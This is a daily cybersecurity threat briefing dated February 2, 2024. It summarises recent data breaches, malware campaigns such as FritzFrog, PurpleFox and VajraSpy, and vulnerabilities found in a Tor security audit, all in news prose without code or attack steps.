Cookie Settings

This website uses cookies and similar technologies to provide essential functionality and improve your experience. Some features, such as demo scheduling and chat support, require marketing cookies to function. By clicking "Accept All", you consent to all cookies. Alternatively, you can customize your preferences, but note that declining marketing cookies will limit certain website features.

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Feb 2, 2024

Demonstrating its growth potential and adaptability, the FritzFrog botnet reflects signs of resilience. Of late, the malware was observed hitting internet-facing apps in an attack campaign dubbed Frog4Shell. It leverages Log4Shell to target internal network hosts with unpatched Java applications. Testing its sly techniques in the wild is the story of PurpleFox. Ukraine's CERT warns that its latest malware campaign has infected over 2,000 computers.

Security researchers took the wraps off of a new Android RAT named VajraSpy. It masqueraded as messaging or news applications to steal personal data and record phone calls from the victims. Furthermore, a code security audit of the Tor anonymity network revealed 17 vulnerabilities.

Top Breaches Reported in the Last 24 Hours

Data leak exposes millions of Indian travelers

Sensitive details, including passports, mobile numbers, and email addresses of approximately 3.5 million Indian travelers, have been exposed in a data leak. The incident stems from the mandatory COVID-19 e-pass application process implemented during the pandemic. The leaked data, originating from the peak of the pandemic, was discovered in an open S3 bucket, potentially linked to a third-party service provider.

Top communication firm targeted

An unidentified hacker claims to have gained unauthorized access to Telefónica, one of the world's largest telecommunications companies. The cyberattack reportedly involved unauthorized access to Fortinet, a key component of the firm's network infrastructure. Details about the extent of the breach and compromised data remain undisclosed. Telefónica faced a similar incident in November 2022, urging customers to change Wi-Fi passwords.

Albania academia faces cyberattack

Albania's Institute of Statistics (INSTAT) reported a cyberattack, describing it as a "sophisticated" incident. The attack prompted the closure of internet links and the activation of emergency protocols to protect data. INSTAT stated that while some systems were affected, those related to a recent census remained unaffected. The motives of the attack aren’t clear yet.

Cloudflare's internal systems breached

Cloudflare disclosed a cybersecurity incident where its internal Atlassian server was breached by a suspected "nation state attacker." The intruder gained access to Cloudflare's Confluence wiki, Jira bug database, and Bitbucket source code management system. The attacker utilized access tokens and service account credentials stolen during a previous compromise linked to Okta's October 2023 breach.

Top Malware Reported in the Last 24 Hours

FritzFrog shifts tactics

The FritzFrog botnet, known for using brute-force attacks to compromise SSH and deploy cryptominers, has evolved to exploit the Log4Shell vulnerability in a campaign named Frog4Shell. According to researchers at Akamai, unlike earlier attacks targeting internet-facing assets, FritzFrog now aims to compromise internal hosts within a victim's network, capitalizing on unpatched systems. The malware has added new capabilities, including privilege escalation and cyber defense evasion tools.

PurpleFox malware hits Ukraine

CERT-UA issued a warning about a PurpleFox malware campaign infecting at least 2,000 computers in the country. The modular Windows botnet malware can act as a downloader for more potent payloads (offering backdoor capabilities) and camouflage as a DDoS bot. Experts observed and tracked infected hosts, identifying 486 intermediate control server IP addresses, with the majority of them situated in China.

Android RAT found in a dozen Android apps

ESET discovered the VajraSpy Android RAT in 12 malicious applications, with six of them available on Google Play between April 1, 2021, and September 10, 2023. Disguised as messaging or news apps, the malware was capable of stealing personal data, including contacts and messages, and recording phone calls. The Patchwork APT group is supposedly involved.

APT group drops BUSHWALK against Ivanti

China-linked APT group UNC5221 is reportedly exploiting vulnerabilities in Ivanti Connect Secure VPN and Policy Secure devices using new malware. Mandiant researchers discovered the attackers using malware such as the BUSHWALK web shell, a new LIGHTWIRE variant, and Python web shell CHAINLINE. The threat actors employ post-exploitation activities, including a mitigation bypass technique observed to deploy the BUSHWALK web shell.

Top Vulnerabilities Reported in the Last 24 Hours

Multiple security bugs found in Tor

A comprehensive security audit of the Tor anonymity network conducted by Radically Open Security discovered 17 vulnerabilities, including a high-risk cross-site request forgery (CSRF) bug in the Onion Bandwidth Scanner (Onbasca). The CSRF vulnerability could allow an unauthenticated attacker to inject bridges into the database, potentially leading to further attacks. While most issues are medium- and low-risk, the CSRF flaw in Onbasca is considered a significant concern.

Related Threat Briefings